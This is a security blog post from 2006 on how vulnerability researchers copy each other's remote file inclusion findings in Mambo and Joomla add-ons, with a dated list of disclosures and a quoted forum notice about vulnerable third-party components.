Vulnerability Research Food Chain
Posted by jericho
I’ve mentioned the sociology aspect of the hacker, vuln researcher and security companies before, specifically how they interact, how one will influence another and more. The list of fun ideas I have on these topics is great, and maybe some day i’ll find the time to write more on them. In the mean time, this obvious one popped up and focuses on vulnerability researchers, how they find bugs, and how some feed off the work of others. We see this often where ResearcherA will find a vulnerability in one script, disclose the information, and ResearcherB will followup shortly after with the same type of vulnerability in a different script of the same product.
Recently we’ve seen a rash of remote file inclusion bugs in various add-ons to Mambo and Joomla. These add-ons are typically not written by the same developers nor are they distributed with the base installation of each product. However, they all seem to have one thing in common: “mosConfigabsolutepath” (or sometimes “absolute_path”). The same variable is being exploited in dozens of different add-ons and being found by different people. If we examine the chain of disclosure, can we see patterns in who consistantly does followup research (low hanging fruit) instead of finding original vulnerabilities? Are there more observations in the way they are disclosed such as reporting to exploit sites vs Bugtraq or Full Disclosure? Are there misplaced signs of ego that accompany what amounts to trivial vulnerability finds while others are more modest and take it for what it is? Is it surprising that as people jump on the bandwagon, more and more reports end up being inaccurate and not a real vulnerability?
While skimming the list, strike-out text indicates the vulnerability has been disputed or proven false. The names of the researchers who didn’t fully check their find are in bold (and i’m curious if the other disclosures hold up under scrutiny). There is one occurance of italics that potentially shows this type of “research” being used in the wild.
2006-08-21 bigAPE-Backup for Mambo - mdx
2006-08-20 Display MOSBot Manager for Mambo - O.U.T.L.A.W (Aria-security)
2006-08-20 EstateAgent for Mambo - O.U.T.L.A.W (Aria-security)
2006-08-19 CatalogShop for Mambo - O.U.T.L.A.W (Aria-security)
2006-08-18 Joomla x-shop - Crackers_Child
2006-08-18 Joomla Rssxt - Crackers_Child
2006-08-18 Kochsuite for Joomla - camino (Insecurity Research Team)
2006-08-18 mtg_myhomepage For Mambo - O.U.T.L.A.W (Aria-security)
2006-08-18 mambo-phphop Product Scroller - O.U.T.L.A.W (Aria-security)
2006-08-17 contentpublisher for Mambo - Crackers_Child
2006-08-17 MambelFish for Mambo - mdx
2006-08-17 JIM for Joomla - XORON
2006-08-17 mosListMessenger for Mambo - Crackers_Child
2006-08-17 anjel for Mambo - Crackers_Child
2006-08-16 Coppermine for Mambo - k1tk4t
2006-08-16 Reporter for Mambo - Crackers_Child
2006-08-16 comlm for Mambo - CrackersChild
2006-08-14 MMP for Mambo - mdx
2006-08-14 PeopleBook for Mambo - Matdhule
2006-08-10 Remository for Mambo - camino (Insecurity Research Team)
2006-08-07 JD-Wiki for Joomla - jank0 (hackbsd crew)
2006-07-31 Mambatstaff for Mambo - Dr.Jr7
2006-07-30 UHP for Mambo - Kurdish Security
2006-07-29 artlinks for Mambo - Dr.Jr7
2006-07-29 Colophon for Joomla - Drago84 (Exclusive Security Italian Security)
2006-07-28 Security Images for Joomla - Drago84
2006-07-28 MGM for Mambo - A-S-T TEAM
2006-07-28 Guestbook for Mambo - Matdhule
2006-07-24 PrinceClan Chess for Mambo - Tr_ZiNDaN
2006-07-20 MultiBanners for Mambo - Blue|Spy
2006-07-17 Mambo-SMF Forum - ASIANEAGLE
2006-07-17 VideoDB for Mambo - h4ntu (#batamhacker crew)
2006-07-17 LoudMouth for Mambo - h4ntu (#batamhacker crew)
2006-07-17 PollXT for Joomla - vitux
2006-07-17 Calendar for Mambo - Matdhule
2006-07-17 New Article for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-13 perForms for Joomla - “Vuln founded in a log file: lazy 0day!!! :D”
2006-07-12 Hashcash for Joomla - Ahmad Maulana a.k.a Matdhule
2006-07-12 SiteMap for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-12 HTMLArea3 for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-10 PccookBook for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-07 ExtCalendar for Mambo - Ahmad Maulana a.k.a Matdhule
2006-07-03 Galleria for Mambo - sikunYuk
2006-06-26 CBSMS Mambo Module - Kw3[R]Ln (Romanian Security Team)
2006-06-13 Jobline for Mambo - SpC-x
While all of this not necessarily useful to many, this line of research and observation is fascinating.
http://forum.joomla.org/index.php/topic,79477.0.html
Attention: Official List of Vulnerable 3rd Party Add-ons!!! « on: July 23, 2006, 06:11:29 PM »
This will be the home of an official list of all the 3rd party components with known vulnerabilities. Please keep in mind that this list is a work in progress. If there is a “(?)” mark next to an entry it means that I am not sure about some of the details like which version is vulnerable, etc. If you are familiar with these or are the developer or something of that nature I would appreciate your help in clarifying the information. So please check to make sure that I listed the component name, short name, version and suggested fix accurately. I have also added as many references as I could reasonably find so people can find more information on the reports and possibly problems other users have faced from upgrading or not upgrading.
[..]
Ok, this posting is old, but fact of the matter is this: the builders should really begin to get concerned. I am working on a PoC tool that shows how bad an RFI can really be, and no one seems to be taking it seriously. We are mangling more RFI’s than anything else, and yet I just can’t believe no one is doing anything to prevent it. Start listening to Silver Bullet, that’s all I can say.